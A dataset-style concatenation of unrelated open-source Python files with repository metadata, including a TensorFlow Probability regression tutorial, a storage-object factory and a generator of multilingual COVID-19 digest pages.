|
[
"Apache-2.0"
] | null | null | null |
__authors__ = ['Khyber Sen', 'Bayan Berri', 'Naotaka Kinoshita', 'Brian Leung']
__date__ = '2017-10-30'
from core import app
if __name__ == '__main__':
app.run()
| 21.875 | 80 | 0.645714 |
d0cb0801e4bea85214c13aec8e062c324cd6b2b4
| 664 |
py
|
Python
|
src/bo4e/enum/gebiettyp.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 1 |
2022-03-02T12:49:44.000Z
|
2022-03-02T12:49:44.000Z
|
src/bo4e/enum/gebiettyp.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 21 |
2022-02-04T07:38:46.000Z
|
2022-03-28T14:01:53.000Z
|
src/bo4e/enum/gebiettyp.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | null | null | null |
# pylint:disable=missing-module-docstring
from bo4e.enum.strenum import StrEnum
class Gebiettyp(StrEnum):
"""
List of possible Gebiettypen.
"""
REGELZONE = "REGELZONE" #: Regelzone
MARKTGEBIET = "MARKTGEBIET" #: Marktgebiet
BILANZIERUNGSGEBIET = "BILANZIERUNGSGEBIET" #: Bilanzierungsgebiet
VERTEILNETZ = "VERTEILNETZ" #: Verteilnetz
TRANSPORTNETZ = "TRANSPORTNETZ" #: Transportnetz
REGIONALNETZ = "REGIONALNETZ" #: Regionalnetz
AREALNETZ = "AREALNETZ" #: Arealnetz
GRUNDVERSORGUNGSGEBIET = "GRUNDVERSORGUNGSGEBIET" #: Grundversorgungsgebiet
VERSORGUNGSGEBIET = "VERSORGUNGSGEBIET" #: Versorgungsgebiet
| 33.2 | 80 | 0.725904 |
efd83cda4056e7bcf6fbc513a598991d75dba1ed
| 140 |
py
|
Python
|
diversos/reduce.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | 1 |
2021-12-18T15:29:24.000Z
|
2021-12-18T15:29:24.000Z
|
diversos/reduce.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | null | null | null |
diversos/reduce.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | 3 |
2021-08-23T22:45:20.000Z
|
2022-02-17T13:17:09.000Z
|
from functools import reduce
def somar (x, y ):
return x + y
lista = [1,3,5,7,9 , 11, 13 ]
soma = reduce (somar , lista)
print(soma)
| 17.5 | 30 | 0.614286 |
4be4a79b845c9c4d144b840a18ee92f49791dffb
| 9,882 |
py
|
Python
|
TensorflowProbability/nonlinear_regression.py
|
stanton119/data-analysis
|
b6fda815c6cc1798ba13a5d2680369b7e5dfcdf9
|
[
"Apache-2.0"
] | null | null | null |
TensorflowProbability/nonlinear_regression.py
|
stanton119/data-analysis
|
b6fda815c6cc1798ba13a5d2680369b7e5dfcdf9
|
[
"Apache-2.0"
] | 1 |
2021-02-11T23:44:52.000Z
|
2021-02-11T23:44:52.000Z
|
TensorflowProbability/nonlinear_regression.py
|
stanton119/data-analysis
|
b6fda815c6cc1798ba13a5d2680369b7e5dfcdf9
|
[
"Apache-2.0"
] | 1 |
2021-12-16T01:02:23.000Z
|
2021-12-16T01:02:23.000Z
|
# %% [markdown]
# # Linear regression to non-linear probabilistic neural network
# In this post I will attempt to go over the steps from a simple linear regression
# to a non-linear probabilistic model built with a neural network.
#
# This is particularly useful in cases where the model noise changes with one of the model variables
# or is non-linear, such as in models with heteroskedasticity.
#
# Import stuff:
# %%
import numpy as np
import pandas as pd
import tensorflow as tf
import tensorflow_probability as tfp
import matplotlib.pyplot as plt
plt.style.use("seaborn-whitegrid")
# %% [markdown]
# Let's generate some data with non-linearities that would pose some issues for a linear regression solution:
# %% Generate linear regression data with heteroskedasticity
# amount of noise that is added is a function of x
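# i.e. y = -0.5 + 1.3*x + 3*cos(0.5*x) + eps, with eps ~ N(0, (sin(0.4*x) + 1)^2),
# so the noise standard deviation itself depends on x (a restatement of the code below)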
n = 20000
x = np.random.uniform(-10, 10, size=n)
noise_std = np.sin(x * 0.4) + 1
y = (
-0.5
+ 1.3 * x
+ 3 * np.cos(x * 0.5)
+ np.random.normal(loc=0, scale=noise_std)
)
x_train = x[: n // 2]
x_test = x[n // 2 :]
y_train = y[: n // 2]
y_test = y[n // 2 :]
plt.plot(x, y, ".")
plt.xlabel("x")
plt.ylabel("y")
plt.title("Weird looking data")
plt.show()
# %% [markdown]
# ## Linear regression approach
# We can fit a linear regression model using tensorflow.
# This model would have no hidden layers, so the output can only be a linear weighted sum of the input and a bias.
# We optimise for the mean squared error, which is the standard loss function for linear regression.
# %%
model_lin_reg = tf.keras.Sequential(
[tf.keras.layers.Input(shape=(1,)), tf.keras.layers.Dense(1)]
)
model_lin_reg.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.01),
loss=tf.keras.losses.mse,
metrics=[tf.keras.losses.mse],
)
history = model_lin_reg.fit(x_train, y_train, epochs=10, verbose=0)
# Model has converged fine:
plt.plot(history.history["loss"])
plt.show()
print(f"""Final loss: {history.history["loss"][-1]:0.2f}""")
# %% [markdown]
# We'll define a couple helper functions to plot results:
# %%
def plot_results(x, y, y_est_mu, y_est_std=None):
plt.figure(figsize=(10, 6))
plt.plot(x, y, ".", label="y")
plt.plot(x, y_est_mu, "-y", label="y_est_mu")
if y_est_std is not None:
plt.plot(x, y_est_mu + 2 * y_est_std, "-r", label="mu+2std")
plt.plot(x, y_est_mu - 2 * y_est_std, "-r", label="mu-2std")
plt.legend()
plt.show()
def plot_model_results(model, x, y, tfp_model: bool = True):
si = np.argsort(x)
x = x[si]
y = y[si]
yhat = model(x)
if tfp_model:
y_est_mu = yhat.mean()
y_est_std = yhat.stddev()
else:
y_est_mu = yhat
        y_est_std = None
plot_results(x, y, y_est_mu, y_est_std)
# %% [markdown]
# Plotting the fitted results from the linear regression shows it cannot capture the non-linearity of the data.
# The standard deviation of the model residuals doesn't affect the converged regression coefficients so it is not plotted.
# %%
plot_model_results(model_lin_reg, x_train, y_train, tfp_model=False)
# %% [markdown]
# ## Tensorflow probability
# We can fit the same model above by maximising the likelihood of a normal distribution, where the mean is the estimates of the linear regression model.
# This can be built within tensorflow probability.
# The `DistributionLambda` is used to send the outputs of the `Dense` layer to the inputs of the distribution output layer.
# The standard deviation is initially set to a static value.
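# With a fixed scale $\sigma$, the negative log-likelihood of a Normal is
# $-\log p(y) = \frac{(y-\mu)^2}{2\sigma^2} + \log(\sigma\sqrt{2\pi})$, so minimising it
# is equivalent to minimising the MSE up to constants (a standard identity, added here for clarity).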
# %%
def negloglik(y, distr):
return -distr.log_prob(y)
model_lin_reg_tfp = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(1,)),
tf.keras.layers.Dense(1),
tfp.layers.DistributionLambda(
lambda t: tfp.distributions.Normal(loc=t, scale=5,)
),
]
)
model_lin_reg_tfp.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.05), loss=negloglik
)
history = model_lin_reg_tfp.fit(x_train, y_train, epochs=20, verbose=0)
# plt.plot(history.history["loss"])
# plt.show()
plot_model_results(model_lin_reg_tfp, x_train, y_train, tfp_model=True)
# %% [markdown]
# ## Fit linear regression with its standard deviation
# In order to fit the optimal standard deviation of the linear regression model we do a couple of things.
# We need the network to output two nodes, one for the mean as before and one for the standard deviation.
# Using the `DistributionLambda` layer we feed the two parameters appropriately.
# The softplus function is used to constrain the standard deviation to be positive.
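# (Softplus is $\log(1 + e^{t})$: smooth, and strictly positive for any real input.)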
# %%
model_lin_reg_std_tfp = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(1,)),
tf.keras.layers.Dense(2),
tfp.layers.DistributionLambda(
lambda t: tfp.distributions.Normal(
loc=t[:, 0:1], scale=tf.math.softplus(t[:, 1:2])
)
),
]
)
model_lin_reg_std_tfp.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.1), loss=negloglik
)
history = model_lin_reg_std_tfp.fit(x_train, y_train, epochs=50, verbose=0)
# plt.plot(history.history["loss"])
# plt.show()
plot_model_results(model_lin_reg_std_tfp, x_train, y_train, tfp_model=True)
# %% [markdown]
# The above plot shows that both the standard deviation and mean are tuned differently to before.
# They both increase with the x variable.
# However they are still not great fits for the data, as they don't capture the non-linearities.
#
# ## Neural network approach
# To help fit the non-linearities we see in the relationship between x and y we can utilise a neural network.
# This can simply be the same tensorflow model we designed about, but with a hidden layer with a non-linear activation function.
# The sigmoid activation function was used as it is smooth and continuous, similar to our training data.
# %%
model_lin_reg_std_nn_tfp = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(1,)),
tf.keras.layers.Dense(10, activation="sigmoid"),
tf.keras.layers.Dense(2),
tfp.layers.DistributionLambda(
lambda t: tfp.distributions.Normal(
loc=t[:, 0:1], scale=tf.math.softplus(t[:, 1:2])
)
),
]
)
model_lin_reg_std_nn_tfp.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.05), loss=negloglik
)
history = model_lin_reg_std_nn_tfp.fit(x_train, y_train, epochs=50, verbose=0)
# plt.plot(history.history["loss"])
# plt.show()
plot_model_results(model_lin_reg_std_nn_tfp, x_train, y_train, tfp_model=True)
# %% [markdown]
# The fitted means from the neural network model follow the data non-linearity much better than the linear regression case.
#
# ## Results
# We run the models against the train and test sets. There is not a large performance change between the two on any model.
# So overfitting doesn't seem to be an issue. We can see that the neural network model performs best on both the training and test sets.
# %% Test set likelihood
results = pd.DataFrame(index=["Train", "Test"])
models = {
"Linear regression": model_lin_reg_tfp,
"Linear regression + std": model_lin_reg_std_tfp,
"Neural network + std": model_lin_reg_std_nn_tfp,
}
for model in models:
results[model] = [
tf.reduce_mean(
negloglik(y_train[:, tf.newaxis], models[model](x_train))
).numpy(),
tf.reduce_mean(
negloglik(y_test[:, tf.newaxis], models[model](x_test))
).numpy(),
]
results.transpose()
# %% [markdown]
# ## Extra little bit: Activation functions
# Using the same network with different activation functions helps motivate our choice of sigmoid.
# The following creates the same network with either a relu or softplus activation function.
# Both of these act as a sort of step function, with softplus being a smooth version of relu.
# First the results from relu network:
# %% Relu activation function
model_relu = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(1,)),
tf.keras.layers.Dense(10, activation="relu"),
tf.keras.layers.Dense(2),
tfp.layers.DistributionLambda(
lambda t: tfp.distributions.Normal(
loc=t[:, 0:1], scale=tf.math.softplus(t[:, 1:2])
)
),
]
)
model_relu.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.05), loss=negloglik
)
history = model_relu.fit(x_train, y_train, epochs=50, verbose=0)
# plt.plot(history.history["loss"])
# plt.show()
plot_model_results(model_relu, x_train, y_train)
# %% [markdown]
# Then with softplus:
# %% softplus activation function
model_softplus = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(1,)),
tf.keras.layers.Dense(10, activation="softplus"),
tf.keras.layers.Dense(2),
tfp.layers.DistributionLambda(
lambda t: tfp.distributions.Normal(
loc=t[:, 0:1], scale=tf.math.softplus(t[:, 1:2])
)
),
]
)
model_softplus.compile(
optimizer=tf.optimizers.Adam(learning_rate=0.05), loss=negloglik
)
history = model_softplus.fit(x_train, y_train, epochs=50, verbose=0)
# plt.plot(history.history["loss"])
# plt.show()
plot_model_results(model_softplus, x_train, y_train)
# %% [markdown]
# We can see that the sigmoid based network has the best performance:
# %%
results = pd.DataFrame(index=["Train", "Test"])
models = {
"Linear regression": model_lin_reg_tfp,
"Linear regression + std": model_lin_reg_std_tfp,
"Neural network + std": model_lin_reg_std_nn_tfp,
"Neural network relu": model_relu,
"Neural network softplus": model_softplus,
}
for model in models:
results[model] = [
tf.reduce_mean(
negloglik(y_train[:, tf.newaxis], models[model](x_train))
).numpy(),
tf.reduce_mean(
negloglik(y_test[:, tf.newaxis], models[model](x_test))
).numpy(),
]
results.transpose()
| 34.432056 | 152 | 0.69065 |
ef6303b465410a24d5e7bd82a0031a969bc5d56c
| 42 |
py
|
Python
|
Tag_01/a-03_hello_world.py
|
MrMontag/internship-june-2021
|
44bcf06c50535c0cadee3d305b0a0da9653b1cf1
|
[
"CC0-1.0"
] | null | null | null |
Tag_01/a-03_hello_world.py
|
MrMontag/internship-june-2021
|
44bcf06c50535c0cadee3d305b0a0da9653b1cf1
|
[
"CC0-1.0"
] | null | null | null |
Tag_01/a-03_hello_world.py
|
MrMontag/internship-june-2021
|
44bcf06c50535c0cadee3d305b0a0da9653b1cf1
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/python3
print("Hallo World!")
| 10.5 | 21 | 0.666667 |
32603680c3393bee4e46c1ae84c7814e6c012fd4
| 384 |
py
|
Python
|
PINp/2015/GOLOVIN_A_I/task_1_7.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PINp/2015/GOLOVIN_A_I/task_1_7.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PINp/2015/GOLOVIN_A_I/task_1_7.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Task 1. Variant 7.
# Write a program that reports the occupation and the pen name under which
# Eduard Georgievich Zyubin hides. After printing the information, the program
# must wait until the user presses Enter to exit.
# Golovin.A.I
# 02.06.2016
print ("Эдуард Георгиевич Зюбин, более известный как Шубин - писатель")
input("\n\nНажмите Enter для выхода.")
| 54.857143 | 233 | 0.783854 |
f5fcb3c996c5806487a0c1b1d6b82c9a8945c5ca
| 393 |
py
|
Python
|
volley/data_models.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 8 |
2022-02-24T14:59:24.000Z
|
2022-03-31T04:37:55.000Z
|
volley/data_models.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 3 |
2022-02-27T17:08:52.000Z
|
2022-03-18T13:11:01.000Z
|
volley/data_models.py
|
shipt/py-volley
|
0114651478c8df7304d3fe3cb9f72998901bb3fe
|
[
"MIT"
] | 2 |
2022-02-24T15:03:07.000Z
|
2022-03-15T03:12:00.000Z
|
# Copyright (c) Shipt, Inc.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import TypeVar
from volley.models.pydantic_model import GenericMessage, QueueMessage
GenericMessageType = TypeVar("GenericMessageType", bound=GenericMessage)
__all__ = ["GenericMessage", "QueueMessage", "GenericMessageType"]
| 32.75 | 72 | 0.796438 |
26e6facfb72def484f8b4d8418af2a0176ae6452
| 4,185 |
py
|
Python
|
quark_core_api/data/storage/storage_factory.py
|
arcticle/Quark
|
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
|
[
"MIT"
] | null | null | null |
quark_core_api/data/storage/storage_factory.py
|
arcticle/Quark
|
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
|
[
"MIT"
] | null | null | null |
quark_core_api/data/storage/storage_factory.py
|
arcticle/Quark
|
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
|
[
"MIT"
] | null | null | null |
import os, six, abc
from copy import deepcopy
from attrdict import AttrDict
from future.utils import viewitems
from future.builtins import super
from app_settings import Config
from quark_core_api.data.storage import CollectionObject, ComplexObject, KeyValueObject, Validator
from quark_core_api.common import DelayedEventHandler
from quark_core_api.exceptions import InvalidOperationException
class StorageObjectFactory(object):
def __init__(self, object_types=None):
self._object_type_map = {}
if not object_types:
object_types = self._get_default_object_types()
self._create_object_type_map(object_types)
def create(self, id, data, validator):
value_type = type(data[id])
storage_object = self._object_type_map[value_type]
return storage_object(id, data, validator)
def _create_object_type_map(self, object_types):
for value_type, object_type in object_types:
self._object_type_map[value_type] = object_type
def _get_default_object_types(self):
yield (list, CollectionObject)
yield (dict, ComplexObject)
yield (str, KeyValueObject)
yield (int, KeyValueObject)
yield (float, KeyValueObject)
yield (bool, KeyValueObject)
@six.add_metaclass(abc.ABCMeta)
class StorageBase(object):
def __init__(self, data, schema=None):
self.__data__ = data
self.__schema__ = schema
self.__objects__ = []
self._object_factory = StorageObjectFactory()
self.object_changed = DelayedEventHandler()
self._create_objects(data, schema)
@property
def data(self):
return deepcopy(self.__data__)
@property
def schema(self):
return deepcopy(self.__schema__)
@property
def entries(self):
return deepcopy(self.__objects__)
def create_entry(self, data, schema=None):
for object_name, value in viewitems(data):
if object_name in self.__data__:
raise InvalidOperationException(
"Invalid data provided. Key already exists.")
self.__data__[object_name] = value
self._create_objects(data, schema)
def _create_objects(self, data, schema):
for object_name in data:
if schema and object_name in schema:
validator = Validator(schema[object_name])
else:
validator = None
storage_object = self._object_factory.create(object_name, data, validator)
storage_object.on_change += self._on_object_change
self.__objects__.append(object_name)
setattr(self, object_name, storage_object)
self.object_changed(storage_object)
def _on_object_change(self, sender, action=None):
self.object_changed(self, changed_object=sender)
def __getitem__(self, key):
return getattr(self, key)
class InMemoryStorage(StorageBase):
def __init__(self, name, data, schema=None):
super().__init__(AttrDict(data), schema=schema)
self.name = name
class FileStorage(StorageBase):
def __init__(self,
path,
default_type=None,
initializer=None,
schema=None,
auto_create=False):
self._path = path
file_exists = os.path.isfile(path)
self._filestore = Config(path,
default=default_type,
auto_create=auto_create)
self.name = self._filestore.files[0]
if not file_exists and initializer:
self._initialize(initializer)
self._filestore.save_all()
super().__init__(self._filestore[self.name], schema)
def _on_object_change(self, sender, action=None):
self._filestore.save_all()
super()._on_object_change(sender, action=action)
def _initialize(self, initializer):
for object_name, value in viewitems(initializer):
if not object_name in self._filestore[self.name]:
self._filestore[self.name][object_name] = value
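# A minimal usage sketch (hypothetical data; the wrapped *Object types come from
# quark_core_api.data.storage and their exact APIs are assumed, not shown here):
#   store = InMemoryStorage("demo", {"title": "quark", "params": {"depth": 3}})
#   store.entries    # -> ["title", "params"]
#   store["title"]   # -> the KeyValueObject wrapping data["title"]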
| 32.44186 | 98 | 0.649223 |
f8c0e8bc48ef9ad008382516f69ada57a83115d7
| 13,276 |
py
|
Python
|
src/manual-md/page_generator.py
|
MisterFISHUP/covid-19-in-france
|
022dec339008a16016358f2bf4612525772c33dd
|
[
"Apache-2.0"
] | 8 |
2021-04-20T09:57:56.000Z
|
2021-12-05T16:52:37.000Z
|
src/manual-md/page_generator.py
|
MisterFISHUP/covid-19-in-france
|
022dec339008a16016358f2bf4612525772c33dd
|
[
"Apache-2.0"
] | 5 |
2021-05-15T10:43:58.000Z
|
2021-10-10T16:25:48.000Z
|
src/manual-md/page_generator.py
|
MisterFISHUP/covid-19-in-france
|
022dec339008a16016358f2bf4612525772c33dd
|
[
"Apache-2.0"
] | 5 |
2021-05-02T06:36:07.000Z
|
2021-09-11T17:42:40.000Z
|
# To add a new cell, type '# %%'
# To add a new markdown cell, type '# %% [markdown]'
# %% [markdown]
# ## Import modules and define global constants
# %%
# this py file is generated from notebook (ipynb file)
import shutil
from pathlib import Path
from datetime import date, timedelta
from opencc import OpenCC
digest_start = date(2020, 3, 1)
start_year = 2020
cur_year = 2021
lastest_month = 10
lastest_day = 9
one_day = timedelta(days=1)
# not using strftime("%B") for months since it depends on the current locale
month_en = ('January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December')
month_fr = ('janvier', 'février', 'mars', 'avril', 'mai', 'juin', 'juillet', 'août', 'septembre', 'octobre', 'novembre', 'décembre')
weekday_zh_hant = ('週一', '週二', '週三', '週四', '週五', '週六', '週日')
weekday_zh_hans = ('周一', '周二', '周三', '周四', '周五', '周六', '周日')
weekday_en = ('Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday')
weekday_fr = ('lundi', 'mardi', 'mercredi', 'jeudi', 'vendredi', 'samedi', 'dimanche')
# %% [markdown]
# ## Get manual md path and content
# %%
def path_manual(y, m, d, locale='zh-Hant'):
'''
Return path like `./manual[_{locale}]/2020/3/18.md`
'''
dir_name = 'manual' if locale == 'zh-Hant' else f'manual_{locale}'
return Path(dir_name, str(y), str(m), f'{d}.md')
def manual_content(y, m, d, locale='zh-Hant'):
    md_file = path_manual(y, m, d)
    md_file_sc = path_manual(y, m, d, 'zh-Hans')
    if locale == 'zh-Hant':
        if Path(md_file).is_file():
            with open(md_file, 'r', encoding='utf-8') as f:
                content = f.read()
            return content
        return ''
    if locale == 'zh-Hans':
        if Path(md_file_sc).is_file():
            with open(md_file_sc, 'r', encoding='utf-8') as f:
                content = f.read()
            return content
        else:
            # no hand-written simplified file: convert the traditional-Chinese one on the fly
            t2s = OpenCC('tw2sp.json')
            return t2s.convert(manual_content(y, m, d))
    # for any other locales
    return ''
# manual_content(2021,3,1,'zh-Hans')
# %% [markdown]
# ## Generate digest content string
#
# For mdx that will be generated
# %%
def digest_content(y, m, d, locale='zh-Hant'):
'''Return the string for the page of y/m/d'''
dt = date(y, m, d)
man = manual_content(y, m, d, locale)
front_matter = f'''---
title: {y} 年 {m} 月 {d} 日({weekday_zh_hant[dt.weekday()]})
sidebar_label: {m} 月 {d} 日({weekday_zh_hant[dt.weekday()]})
description: {y} 年 {m} 月 {d} 日法國新冠肺炎疫情匯報。法國 COVID-19 日誌第 {(dt - digest_start).days + 1} 篇。
---
'''
export_import = f'''
export const date = "{dt.strftime('%Y-%m-%d')}";
import {{ Subtitle, Grace, Fish, OfficialData, SourceFb, Figure, ChartCases }} from "@site/src/scripts/digest-components";
import {{ DigestLinkButton }} from "@site/src/scripts/components/DigestLinkButton";
'''
subtitle = '''
<Subtitle date={date} />
'''
main_img = '''
<Figure date={date}></Figure>
'''
sourceOfData = '''
<div className="comment--translc_gray">📈 數據來源:請參考附錄<a href="../../sources">資料來源</a>。</div>
'''
chartCases = '''
<ChartCases date={date} />
'''
official_data_heading = '''
## 法國官方數據 {#official-statistics}
'''
official_data = '''
<OfficialData date={date} />
'''
news_only_zh = ''
sourceFb = '''
<SourceFb date={date} />
'''
news_heading = '''
## 本日新聞重點 {#news}
'''
random_digest_button = '''
<br />
<div className="flex-center--wrap">
<DigestLinkButton linkType="random" isButtonOutline={true} buttonText="🎲 閱讀隨機一篇日誌" />
</div>
'''
# overwrite some strings for `zh-Hans`
if locale == 'zh-Hans':
front_matter = f'''---
title: {y} 年 {m} 月 {d} 日({weekday_zh_hans[dt.weekday()]})
sidebar_label: {m} 月 {d} 日({weekday_zh_hans[dt.weekday()]})
description: {y} 年 {m} 月 {d} 日法国新冠肺炎疫情汇报。法国 COVID-19 日志第 {(dt - digest_start).days + 1} 篇。
---
'''
sourceOfData = '''
<div className="comment--translc_gray">📈 数据来源:请参考附录<a href="../../sources">数据源</a>。</div>
'''
official_data_heading = '''
## 法国官方数据 {#official-statistics}
'''
news_heading = '''
## 本日新闻重点 {#news}
'''
random_digest_button = '''
<br />
<div className="flex-center--wrap">
<DigestLinkButton linkType="random" isButtonOutline={true} buttonText="🎲 阅读随机一篇日志" />
</div>
'''
# overwrite some strings for `en`
if locale == 'en':
front_matter = f'''---
title: {weekday_en[dt.weekday()]}, {d} {month_en[m-1]} {y}
sidebar_label: {weekday_en[dt.weekday()][:3]}. {d} {month_en[m-1]}
description: Daily digest of COVID-19 in France on {d} {month_en[m-1]} {y}. Day {(dt - digest_start).days + 1}.
---
'''
sourceOfData = '''
<div className="comment--translc_gray">📈 Data sources: see <a href="../../sources">Appendix - Sources</a>.</div>
'''
official_data_heading = '''
## Official Statistics {#official-statistics}
'''
news_only_zh = '''
<div className="comment--translc_gray">📢 For the COVID-19 Daily News Digest, it is only available in <strong>traditional Chinese</strong> and <strong>simplified Chinese</strong> at the moment.</div><br />
'''
news_heading = '''
## COVID-19 Daily News Digest {#news}
'''
random_digest_button = '''
<br />
<div className="flex-center--wrap">
<DigestLinkButton linkType="random" isButtonOutline={true} buttonText="🎲 Read a random digest" />
</div>
'''
# overwrite some strings for `fr`
if locale == 'fr':
front_matter = f'''---
title: {weekday_fr[dt.weekday()].capitalize()} {d} {month_fr[m-1]} {y}
sidebar_label: {weekday_fr[dt.weekday()][:3]}. {d} {month_fr[m-1]}
description: Résumé quotidien du COVID-19 en France le {d} {month_fr[m-1]} {y}. Jour {(dt - digest_start).days + 1}.
---
'''
sourceOfData = '''
<div className="comment--translc_gray">📈 Sources des données : voir <a href="../../sources">Appendice - Sources</a>.</div>
'''
official_data_heading = '''
## Statistiques officielles {#official-statistics}
'''
news_only_zh = '''
<div className="comment--translc_gray">📢 Pour l'actualité en bref du COVID-19, elle n'est pour le moment disponible qu'en <strong>chinois traditionnel</strong> et en <strong>chinois simplifié</strong>.</div><br />
'''
news_heading = '''
## Actualité en bref {#news}
'''
random_digest_button = '''
<br />
<div className="flex-center--wrap">
<DigestLinkButton linkType="random" isButtonOutline={true} buttonText="🎲 Lire un résumé aléatoire" />
</div>
'''
if man:
man = '\n' + man + '\n'
else:
sourceFb = ''
news_heading = ''
# There's no data for 2020/3/1
if dt == date(2020,3,1):
return front_matter + export_import + subtitle + main_img + man + random_digest_button
return front_matter + export_import + subtitle + main_img + sourceOfData + chartCases + official_data_heading + official_data + news_only_zh + sourceFb + news_heading + man + random_digest_button
# print(digest_content(2021,3,2, 'fr'))
# %% [markdown]
# ## Generate digest pages
#
# Generate
# - `/docs/{year}/{month_en_lower}/{day}.mdx`
# - `/i18n/{locale}/docusaurus-plugin-content-docs/current/{year}/{month_en_lower}/{day}.mdx`
# with content given by `digest_content` function
#
# Note: Should generate pages ONLY for dates after 2020/3/1 (included)
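#
# For example, `generate_a_page(2021, 3, 2)` would write `/docs/2021/march/2.mdx` and one
# mdx per locale under `/i18n/{locale}/docusaurus-plugin-content-docs/current/2021/march/`.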
# %%
def generate_a_page(y, m, d):
'''
Generate the digest page of date d/m/y for zh-Hant, zh-Hans, en and fr
'''
folder = Path('..', '..', 'docs', str(y), month_en[m-1].lower())
folder_sc = Path('..', '..', 'i18n', 'zh-Hans', 'docusaurus-plugin-content-docs', 'current', str(y), month_en[m-1].lower())
folder_en = Path('..', '..', 'i18n', 'en', 'docusaurus-plugin-content-docs', 'current', str(y), month_en[m-1].lower())
folder_fr = Path('..', '..', 'i18n', 'fr', 'docusaurus-plugin-content-docs', 'current', str(y), month_en[m-1].lower())
mdx = Path(folder, f'{d}.mdx')
mdx_sc = Path(folder_sc, f'{d}.mdx')
mdx_en = Path(folder_en, f'{d}.mdx')
mdx_fr = Path(folder_fr, f'{d}.mdx')
    # write file: zh-Hant
    folder.mkdir(parents=True, exist_ok=True)
    with open(mdx, 'w', encoding='utf-8') as f:
        f.write(digest_content(y, m, d))
    # write file: zh-Hans
    folder_sc.mkdir(parents=True, exist_ok=True)
    with open(mdx_sc, 'w', encoding='utf-8') as f:
        f.write(digest_content(y, m, d, 'zh-Hans'))
    # write file: en
    folder_en.mkdir(parents=True, exist_ok=True)
    with open(mdx_en, 'w', encoding='utf-8') as f:
        f.write(digest_content(y, m, d, 'en'))
    # write file: fr
    folder_fr.mkdir(parents=True, exist_ok=True)
    with open(mdx_fr, 'w', encoding='utf-8') as f:
        f.write(digest_content(y, m, d, 'fr'))
print(f'> generated mdx for {y}/{m}/{d} in `/docs/` and `/i18n/{{locale}}/docusaurus-plugin-content-docs/current/`')
def generate_pages(s_y, s_m, s_d, e_y, e_m, e_d):
s_dt = date(s_y, s_m, s_d)
e_dt = date(e_y, e_m, e_d)
n_pages = (e_dt - s_dt).days + 1
if n_pages < 2:
raise Exception("The ending date should be at least one day after the starting day.")
prompt = f'writing {n_pages} pages: from {s_y}/{s_m}/{s_d} to {e_y}/{e_m}/{e_d} in zh-Hant, zh-Hans, en and fr'
print(f'Start {prompt}...')
dt = s_dt
while (dt != e_dt + one_day):
generate_a_page(dt.year, dt.month, dt.day)
dt += one_day
print(f'Finish {prompt}.')
# generate_pages(2020,3,9,2020,3,10)
# %% [markdown]
# ## Create `intro.mdx` by copying manual `intro.md`
#
# Copy `./manual/{cur_year}/intro.md` to `/docs/{cur_year}/intro.mdx`
#
# Copy `./manual_{locale}/{cur_year}/intro.md` to `/i18n/{locale}/docusaurus-plugin-content-docs/current/{cur_year}/intro.mdx`
# %%
def create_intro_mdx(locale='zh-Hant'):
'''
Copy `./manual/{cur_year}/intro.md` to `/docs/{cur_year}/intro.mdx`,
or `./manual_{locale}/{cur_year}/intro.md` to `/i18n/{locale}/docusaurus-plugin-content-docs/current/{cur_year}/intro.mdx`.
'''
intro_root_dir_from = 'manual' if locale == 'zh-Hant' else f'manual_{locale}'
intro_md_from = Path(intro_root_dir_from, str(cur_year), 'intro.md')
intro_dir_to = Path('..', '..', 'docs', str(cur_year)) if locale == 'zh-Hant' else Path('..', '..', 'i18n', locale, 'docusaurus-plugin-content-docs', 'current', str(cur_year))
intro_md_to = Path(intro_dir_to, 'intro.mdx')
# if intro md file doesn't exist, raise an error
if not intro_md_from.is_file():
if locale == 'zh-Hant':
raise Exception(f"File `./manual/{cur_year}/intro.md` doesn't exist, can't copy it to `/docs/{cur_year}/intro.mdx`.")
else:
raise Exception(f"File `./manual_{locale}/{cur_year}/intro.md` doesn't exist, can't copy it to `/i18n/{locale}/docusaurus-plugin-content-docs/current/{cur_year}/intro.mdx`.")
# intro md file exists as expected, so copy it
else:
intro_dir_to.mkdir(parents=True, exist_ok=True)
shutil.copy(intro_md_from, intro_md_to)
# prompt: copy finished
if locale == 'zh-Hant':
print(f'Copied `./manual/{cur_year}/intro.md` to `/docs/{cur_year}/intro.mdx`.')
else:
print(f'Copied `./manual_{locale}/{cur_year}/intro.md` to `/i18n/{locale}/docusaurus-plugin-content-docs/current/{cur_year}/intro.mdx`.')
